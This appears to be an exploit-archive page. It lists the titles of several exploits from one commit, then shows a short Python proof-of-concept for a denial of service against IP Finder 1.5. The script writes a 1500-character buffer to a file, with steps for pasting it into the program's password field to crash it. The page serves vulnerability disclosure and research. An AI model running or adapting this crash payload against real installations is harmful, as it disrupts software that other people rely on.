1e34c2b6a5
11 changes to exploits/shellcodes IP Finder 1.5 - Denial of Service (PoC) Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC) PLC Wireless Router GPN2.4P21-C-CN - Denial of Service Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC) Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow PostgreSQL 9.4-0.5.3 - Privilege Escalation Android - Directory Traversal over USB via Injection in blkid Output Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit) Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking) Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking) IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
25 lines
No EOL
895 B
Python
Executable file
25 lines
No EOL
895 B
Python
Executable file
# Exploit Title: IP Finder 1.5 - Denial of Service (PoC)
|
|
# Author: Shubham Singh
|
|
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
|
|
# Discovey Date: 2018-08-12
|
|
# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder
|
|
# Tested Version: 1.5
|
|
# Tested on OS: Windows XP Service Pack 3 x86
|
|
# Steps to Reproduce: Run the python exploit script, it will create a new
|
|
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
|
# and start the Search&Config Tool program paste the content of
|
|
# "exploit.txt" in password field. You will see a crash.
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer = "A" * 1500
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("exploit.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |